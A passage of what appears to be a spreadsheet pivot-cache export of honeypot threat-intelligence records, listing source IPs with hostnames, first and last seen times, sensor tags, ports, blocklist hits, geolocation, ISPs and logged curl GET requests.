    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H4"/>
    <s v="23&amp;&amp;56586&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3dde:3a28"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3046"/>
    <x v="3046"/>
    <s v="125-229-90-38.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:01:18"/>
    <d v="2024-07-03T16:42:00"/>
    <d v="2025-04-05T06:01:18"/>
    <n v="464"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;43785&amp;&amp;9100&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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:5a26"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3047"/>
    <x v="3047"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:01:05"/>
    <d v="2024-08-30T07:36:19"/>
    <d v="2025-04-05T06:01:05"/>
    <n v="113"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1363&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:9d4f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3048"/>
    <x v="3048"/>
    <s v="NA&amp;&amp;lfbn-ann-1-12-235.w86-220.abo.wanadoo.fr"/>
    <x v="0"/>
    <d v="2025-04-05T05:56:08"/>
    <d v="2025-04-04T12:02:24"/>
    <d v="2025-04-05T05:56:08"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="ARA"/>
    <s v="Auvergne-Rhône-Alpes"/>
    <s v="Rhône"/>
    <s v="Lyon"/>
    <s v="2996944"/>
    <s v="69000"/>
    <s v="45.764"/>
    <s v="4.83566"/>
    <s v="3215"/>
    <s v="Orange S.A."/>
    <s v="Orange"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2005-03-02"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:56dc:6ceb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3049"/>
    <x v="3049"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T05:39:20"/>
    <d v="2023-10-04T01:53:00"/>
    <d v="2025-04-05T05:39:20"/>
    <n v="562"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;1080&amp;&amp;389&amp;&amp;5900&amp;&amp;22&amp;&amp;23370"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:542d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3050"/>
    <x v="3050"/>
    <s v="1-175-109-10.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T05:29:22"/>
    <d v="2025-04-05T05:29:22"/>
    <d v="2025-04-05T05:29:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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1af:6d0a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3051"/>
    <x v="3051"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T05:27:21"/>
    <d v="2025-04-05T05:26:15"/>
    <d v="2025-04-05T05:27:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Minato-ku"/>
    <s v="Minato-ku"/>
    <s v="1857091"/>
    <s v="NA"/>
    <s v="35.6552"/>
    <s v="139.761"/>
    <s v="17676"/>
    <s v="SoftBank Corp."/>
    <s v="SoftBank Corp."/>
    <s v="business"/>
    <s v="SOFTBANK Corp"/>
    <s v="2005-02-08"/>
    <s v="BBTEC"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7e0b:69db"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3052"/>
    <x v="3052"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T05:11:12"/>
    <d v="2025-04-05T05:11:12"/>
    <d v="2025-04-05T05:11:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b06:deac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3053"/>
    <x v="3053"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T05:06:36"/>
    <d v="2025-04-05T05:05:39"/>
    <d v="2025-04-05T05:06:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKT"/>
    <s v="Kwun Tong"/>
    <s v="NA"/>
    <s v="Kowloon Bay"/>
    <s v="8504415"/>
    <s v="NA"/>
    <s v="22.324"/>
    <s v="114.204"/>
    <s v="9381"/>
    <s v="HKBN Enterprise Solutions HK Limited"/>
    <s v="HKBN Enterprise Solutions HK Limited"/>
    <s v="business"/>
    <s v="HKBN Enterprise Solutions HK Limited"/>
    <s v="2014-11-20"/>
    <s v="HKBNES-HK"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2be0:3145"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3054"/>
    <x v="3054"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T04:27:53"/>
    <d v="2025-04-05T04:27:53"/>
    <d v="2025-04-05T04:27:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:8247"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3055"/>
    <x v="3055"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T04:24:59"/>
    <d v="2024-12-11T13:09:38"/>
    <d v="2025-04-05T04:24:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:6729"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3056"/>
    <x v="3056"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T04:17:53"/>
    <d v="2025-04-05T04:17:53"/>
    <d v="2025-04-05T04:17:53"/>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7:971b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3057"/>
    <x v="3057"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T04:07:30"/>
    <d v="2025-04-04T19:28:33"/>
    <d v="2025-04-05T04:07:30"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Jhargram"/>
    <s v="Jhārgrām"/>
    <s v="1268990"/>
    <s v="721514"/>
    <s v="22.455"/>
    <s v="86.9974"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:a10f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3058"/>
    <x v="3058"/>
    <s v="NA&amp;&amp;82-64-54-204.subs.proxad.net"/>
    <x v="0"/>
    <d v="2025-04-05T04:01:23"/>
    <d v="2023-11-30T02:31:23"/>
    <d v="2025-04-05T04:01:23"/>
    <n v="479"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="15476&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Paris"/>
    <s v="Paris"/>
    <s v="2988507"/>
    <s v="75000"/>
    <s v="48.8566"/>
    <s v="2.35222"/>
    <s v="12322"/>
    <s v="Free SAS"/>
    <s v="Proxad / Free SAS"/>
    <s v="residential"/>
    <s v="ProXad network / Free SA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
